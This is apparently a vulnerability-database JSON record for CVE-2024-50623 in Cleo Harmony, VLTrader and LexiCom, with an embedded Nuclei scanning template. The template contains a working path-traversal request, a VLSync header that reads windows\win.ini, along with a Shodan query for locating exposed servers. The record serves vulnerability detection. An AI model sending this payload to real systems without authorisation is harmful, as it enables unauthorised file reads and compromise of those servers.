{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2024-50623/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2024-50623/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2024-50623/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2024-50623/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2024-50623/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2024-50623"},"sightings":{"href":"/api/v1/sightings/cve-2024-50623"}},"enrichments":{"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2024/CVE-2024-50623.yaml","nuclei_template_severity":"high","nuclei_template_yaml":"id: CVE-2024-50623\n\ninfo:\n  name: Cleo Harmony < 5.8.0.21 - Arbitary File Read\n  author: DhiyaneshDK\n  severity: high\n  description: |\n    In Cleo Harmony before 5.8.0.21, VLTrader before 5.8.0.21, and LexiCom before 5.8.0.21, there is an unrestricted file upload and download that could lead to remote code execution.\n  impact: |\n    Attackers can exploit vulnerabilities to compromise the system.\n  remediation: |\n    Update to the latest patched version addressing CVE-2024-50623.\n  reference:\n    - https://support.cleo.com/hc/en-us/articles/27140294267799-Cleo-Product-Security-Advisory\n    - https://github.com/watchtowrlabs/CVE-2024-50623\n    - https://labs.watchtowr.com/cleo-cve-2024-50623/\n    - https://nvd.nist.gov/vuln/detail/CVE-2024-50623\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\n    cvss-score: 8.8\n    cve-id: CVE-2024-50623\n    cwe-id: CWE-434\n    epss-score: 0.98607\n    epss-percentile: 0.99921\n  metadata:\n    verified: true\n    max-request: 2\n    shodan-query: 'Server: Cleo'\n  tags: cve,cve2024,cleo,vltrader,lexicom,harmony,lfi,kev,vkev,vuln\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET /Synchronization HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(tolower(response), \"cleo\")'\n        internal: true\n\n    extractors:\n      - type: regex\n        name: version\n        part: header\n        group: 1\n        regex:\n          - \"Server: Cleo.*?/([0-9.]+)\"\n        internal: true\n\n  - raw:\n      - |\n        GET /Synchronization HTTP/1.1\n        Host: {{Hostname}}\n        VLSync: Retrieve;l=Ab1234-RQ0258;n=VLTrader;v={{version}};a=1337;po=5080;s=True;b=False;pp=myEncryptedPassphrase;path=..\\..\\..\\windows\\win.ini\n\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"bit app support\"\n          - \"fonts\"\n          - \"extensions\"\n        condition: and\n# digest: 490a00463044022042c4d305d09e70feda27ed71412fdfd0962ba26294191e52daff2130d151bb6b02207f584939e2c38aa6e466b243359dce2628702d72b9c994f8678c6aad15908599:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2024-50623"}